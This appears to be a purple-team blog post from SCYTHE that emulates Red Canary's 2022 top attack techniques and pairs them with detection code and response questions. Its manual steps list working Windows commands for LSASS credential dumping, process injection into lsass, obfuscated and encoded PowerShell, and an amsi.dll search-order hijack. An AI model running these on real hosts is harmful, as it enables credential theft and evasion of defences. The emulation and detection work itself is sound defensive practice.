Operationalizing Red Canary's 2022 Threat Detection Report

Executive Summary

How do we get started with Purple Team? This is a question we hear far too often, and emulating the most prevalent techniques is one of the best ways to get started. Red Canary released the 2022 Threat Detection Report Top Techniques in March 2022; it lists the top techniques they observed over the past year. The purpose of this report and emulation is to baseline visibility into common adversarial techniques. “For leaders, the most prevalent techniques can help you identify gaps as you develop a road map for improving coverage. You can assess your existing sources of collection against the ones listed in this report to inform your investments in new tools and personnel.” - Red Canary

Cyber Threat Intelligence

Red Canary is a legitimate company, not a threat actor. However, they release actionable Cyber Threat Intelligence, which is why we have added it to our community threats. As mentioned in the executive summary, emulating top techniques helps identify and prioritize gaps. From a practitioner standpoint, the data generated allows research and practice with the common telemetry needed for detection engineering.

Attack

If you are a SCYTHE customer, you can automate this attack chain quite easily. If you are not a SCYTHE customer, we provide the manual emulation steps so you can test on your own system.

Automated Emulation

This threat chains together the top techniques from the Red Canary 2022 Threat Detection Report.

  1. Download and import the threats in JSON format to your SCYTHE instance
  2. Download the Virtual File System (VFS) files under VFS
  3. Upload the VFS files to your SCYTHE VFS in the following location: VFS:/shared/threats/RedCanary
  4. Create a new campaign RedCanary2022TDR with HTTPS
  5. Import from Existing Threat: RedCanary2022TDR
  6. Launch the Campaign


Manual Emulation

You can manually execute each technique provided in the Red Canary 2022 Threat Detection Report on a target host by copying and pasting these procedures:

1. powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==

  • Execute this from a non-privileged cmd.exe

2. %LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: del hello.txt

3. rundll32.exe pcwutl.dll,LaunchApplication C:\Windows\System32\notepad.exe

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: wmic process where name="notepad.exe" delete

4. wmic /node:"127.0.0.1" process call create "calc.exe"

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: wmic process where name="calc.exe" delete
  • Note that depending on the Windows version the process may be named Calculator.exe or CalculatorApp.exe

5. rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\Windows\Temp\lsass.dmp full

  • Execute this from a privileged cmd.exe
  • Clean up by executing: del C:\Windows\Temp\lsass.dmp

6. (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt

  • Execute this from a non-privileged powershell.exe
  • Clean up by executing: wmic process where name="notepad.exe" delete
  • Clean up by executing: del LICENSE.txt

7. mavinject.exe ((Get-Process lsass).Id) /INJECTRUNNING C:\Windows\System32\vbscript.dll

  • Execute this from a privileged powershell.exe
  • Clean up by rebooting

8. schtasks /Create /F /SC MINUTE /MO 3 /ST 07:00 /TN CMDTestTask /TR "cmd /c date /T > C:\Windows\Temp\current_date.txt"

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: schtasks /Delete /TN CMDTestTask /F

9. $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

  • Execute this from a non-privileged powershell.exe

10. copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\notepad.exe & C:\Windows\Temp\notepad.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: del C:\Windows\Temp\notepad.exe

11. Set-ExecutionPolicy Bypass -Scope Process -Force ; .\tweet.ps1

  • Download tweet.ps1 to the working directory
  • Execute this from a non-privileged powershell.exe
  • Clean up by executing: del $Env:windir\Temp\svchost.exe

12. copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe & copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll & %APPDATA%\updater.exe -Command exit

  • Execute this from a non-privileged cmd.exe
  • Clean up by executing: del %APPDATA%\updater.exe & del %APPDATA%\amsi.dll

Detection Opportunities

The following are detection opportunities for the specific procedure conducted in emulating the technique. It’s worth noting that this should not be used for full coverage of all procedures that may be conducted under the umbrella of the technique.
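As an added example that is not part of the original SCYTHE writeup, the following Python implements detections for several of the procedures above: decoding a -EncodedCommand argument (steps 1 and 10), the OriginalFileName mismatch that exposes a renamed powershell.exe (steps 10 and 12), the pcwutl, comsvcs MiniDump and mavinject command lines (steps 3, 5 and 7), and amsi.dll being written under AppData (step 12). It assumes Sysmon-style ProcessCreate/FileCreate fields (Image, OriginalFileName, CommandLine, TargetFilename); the sample events are constructed.

```python
# Added example (not SCYTHE's or Red Canary's code): detections for the emulated procedures over constructed Sysmon-style events.
import base64
import ntpath
import re

# Process-creation command-line patterns for steps 3, 5 and 7 above.
CMDLINE_RULES = {
    "rundll32_pcwutl_launch": re.compile(r"pcwutl\.dll,\s*launchapplication", re.I),
    "lsass_dump_via_comsvcs": re.compile(r"comsvcs\.dll.*minidump", re.I),
    "mavinject_injectrunning": re.compile(r"mavinject.*/injectrunning", re.I),
}
# File-creation pattern for step 12: amsi.dll dropped beside a copied PowerShell (search-order hijack).
AMSI_IN_APPDATA = re.compile(r"\\appdata\\roaming\\amsi\.dll$", re.I)
ENCODED_FLAG = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded from base64/UTF-16LE, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event):
    """Return the names of the rules an event triggers (empty list if none)."""
    if event["EventType"] == "FileCreate":
        return ["amsi_dll_written_to_appdata"] if AMSI_IN_APPDATA.search(event["TargetFilename"]) else []
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(cmd)]
    if decode_encoded_command(cmd) is not None:
        hits.append("powershell_encoded_command")
    # Rename detection (steps 10 and 12): the PE's OriginalFileName disagrees with the on-disk name.
    image = ntpath.basename(event.get("Image", "")).lower()
    if event.get("OriginalFileName", "").lower() not in ("", image):
        hits.append("renamed_system_utility")
    return hits
ENCODED = "JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA=="  # the -e argument from step 1 above
SAMPLE_EVENTS = [  # constructed events modelled on steps 10, 5 and 12 above (PID 712 is made up)
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\Temp\notepad.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": r"C:\Windows\Temp\notepad.exe -e " + ENCODED},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\lsass.dmp full"},
    {"EventType": "FileCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\analyst\AppData\Roaming\amsi.dll"},
]
if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["EventType"], ntpath.basename(ev["Image"]), analyze(ev) or "no hits")
```

The decoded payload of step 1 is shown in the clear by decode_encoded_command, which is what an analyst needs to triage an encoded command alert.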

Respond

If any of the alerts are detected in the environment, the response team should determine the depth of the Kill Chain, collect artifacts, and answer the following questions:

  • Was the installation successful?
  • What are the persistent mechanisms?
  • Is Command & Control (C2) successful?
    • What are the domain names, IP addresses, ports, and protocols used?
  • Are there observations of Actions on Objectives (AOO)?
    • What are they?
    • Did the actor laterally move?
    • Was sensitive data taken?
      • Usernames, Passwords, Other?
  • What caused the initial compromise?
    • How was it delivered?
    • What was exploited?
      • Vulnerability, Control, Human?

Once it has been determined how deep the intrusion goes, containment, eradication, and recovery should begin. After recovery, lessons learned should drive additional courses of action (COAs) to thwart the threat should it return, such as implementing additional security controls. As always, please follow your organization's response plan and evidence retention policies. We also recommend leveraging NIST SP 800-61 Rev. 2.

Authors

Christopher Peacock is an Adversary Emulation - Detection Engineer at SCYTHE, specializing in Purple Team Exercises and Detection Engineering. His previous experience includes multiple roles such as Cyber Threat Intelligence Analyst, Cyber Threat Hunter, Tier 3 SOC Analyst, Incident Responder, Cyber Security Consultant, and Purple Team Lead. He previously worked at Raytheon Intelligence & Space and General Dynamics Ordnance & Tactical Systems. Additionally, he has experience in multiple industries, including Energy, Finance, Healthcare, Technology, and Defense. Current certifications include GCTI, GCFA, GCED, eJPT, and CSIS.

Jorge Orchilles is the Chief Technology Officer of SCYTHE and co-creator of the C2 Matrix project and author of the Purple Team Exercise Framework. He is a SANS Certified Instructor and the author of Security 564: Red Team Exercises and Adversary Emulation. He was a founding member of MITRE Engenuity Center of Threat-Informed Defense. He is a Fellow at the Information Systems Security Association (ISSA) and National Security Institute. Prior, Jorge led the offensive security team at Citi for over 10 years.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.

References

  1. https://redcanary.com/threat-detection-report/techniques/
  2. https://redcanary.com/threat-detection-report/techniques/powershell/
  3. https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
  4. https://redcanary.com/threat-detection-report/techniques/rundll32/
  5. https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/
  6. https://redcanary.com/threat-detection-report/techniques/lsass-memory/
  7. https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
  8. https://redcanary.com/threat-detection-report/techniques/process-injection/
  9. https://redcanary.com/threat-detection-report/techniques/scheduled-task/
  10. https://redcanary.com/threat-detection-report/techniques/obfuscated-files-information/
  11. https://redcanary.com/threat-detection-report/techniques/rename-system-utilities/
  12. https://redcanary.com/threat-detection-report/techniques/match-legitimate-name-or-location/
  13. https://redcanary.com/threat-detection-report/techniques/dll-search-order-hijacking/
  14. https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf